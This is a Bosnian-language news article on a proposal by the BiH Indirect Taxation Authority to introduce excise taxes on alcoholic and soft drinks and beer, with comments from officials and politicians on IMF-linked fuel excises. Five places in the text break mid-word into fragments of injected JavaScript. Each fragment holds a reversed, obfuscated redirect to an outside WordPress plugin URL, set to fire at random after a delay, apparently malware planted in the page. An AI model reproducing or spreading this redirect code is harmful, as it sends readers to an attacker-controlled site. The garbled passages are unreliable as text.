UIO BiH oživljava akcize na pivo i sokove

Iz Uprave za indirektno oporezivanje (UIO) BiH najavili su u petak da su Upravnom odboru (UO) UIO BiH dostavili novi stari prijedlog seta zakona o akcizama.

Kako je “Nezavisnim” rekao Ratko Kovačević, portparol Uprave za indirektno oporezivanje BiH, riječ je o prvom prijedlogu koji je UO UIO BiH uputio Vijeću ministara BiH, a to je da se akcize uvedu i na alkoholna i bezalkoholna pića i pivo. “UO UIO BiH će ovaj prijedlog razmatrati na sjednici koja je zakazana za ponedjeljak u Sarajevu”, rekao je Kovačević. Međutim, “Nezavisnim” je iz Kabineta Vjekoslava Bevtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ande, ministra finansija i trezora BiH i predsjedavajućeg UO UIO BiH, potvrđeno da akcize nisu na dnevnom redu sjednice UO UIO, te da je Bevtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}anda rekao sve što je imao o akcizama. Saznajemo da će na dnevnom redu sjednice biti 21 tačka plus dvije dopunske. Miro Džakula, direktor UIO BiH, ranije je pojasnio da je potrebno uskladiti kompletne zakone o akcizama i o PDVu sa zakonskom regulativom EU, kao i da će izmjene Zakona o akcizama doprinijeti razvoju i pokretanju investicionih projekata, što će rezultirati rastom bruto domaćeg proizvoda. Ovaj prijedlog trebalo bi da omogući i rekonstrukciju i sanaciju zdravstvenih fondova i ustanova.

Damir Bećirović (DF), član Komisije za finansije i budžet Predstavničkog doma BiH, ističe da bi neko trebalo pred organima pravde da odgovara za konstantno guranje ovog seta zakona u parlamentarnu proceduru. “Taj prijedlog koji sad UIO BiH upućuje UO UIO BiH bio je već pred Komisijom i nije prošao. Obrazloženje je bilo da se uvođenjem akciza na alkoholna, bezalkoholna pića i pivo pomaže obnova zdravstvenog fonda. Sve je to prihvatljivo, ali prvo treba pred lice pravde dovesti one koji su uništili, pokrali zdravstvene fondove i opljačkali kliničke centre, pa onda krenuti u sanaciju. Što se tiče izgradnje autocesta i cesta, taj novac koji bismo dobili od povećanja akciza na naftu i naftne derivate otišao bi za isplatu sudskih procesa koji se vode pred međtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}unarodnim sudovima, a zbog nelegalnih davanja poslova nekim firmama”, rekao je Bećirović.

Da bi BiH dobila drugu tranšu kredita od Međtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}unarodnog monetarnog fonda mora usvojiti i set zakona o akcima na naftu i naftne derivate, što je i Bakir Izetbegović, lider SDA i član Predsjedništva BiH, ponovio u petak. Rekao je da je za dalji snažan iskorak ka ekonomskoj stabilizaciji neophodno pokrenuti ciklus izgradnje saobraćajne i energetske infrastrukture u BiH. “Kako bismo povukli povoljne kredite međtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}unarodnih banaka, potrebno je ispuniti uslov koji je postavio MMF uvođenje akcize od 15 feninga na cijenu goriva. Akciza u Srbiji iznosi 89 feninga, a u Hrvatskoj 101 fening. Srbija i Hrvatska grade autoputeve, BiH već dvije godine ne gradi”, poručio je Izetbegović.

Nezavisne

Pogrebni prevoz Iris Lim Profi Prijedor Panta rhei Prijedor

You must be logged in to post a comment Login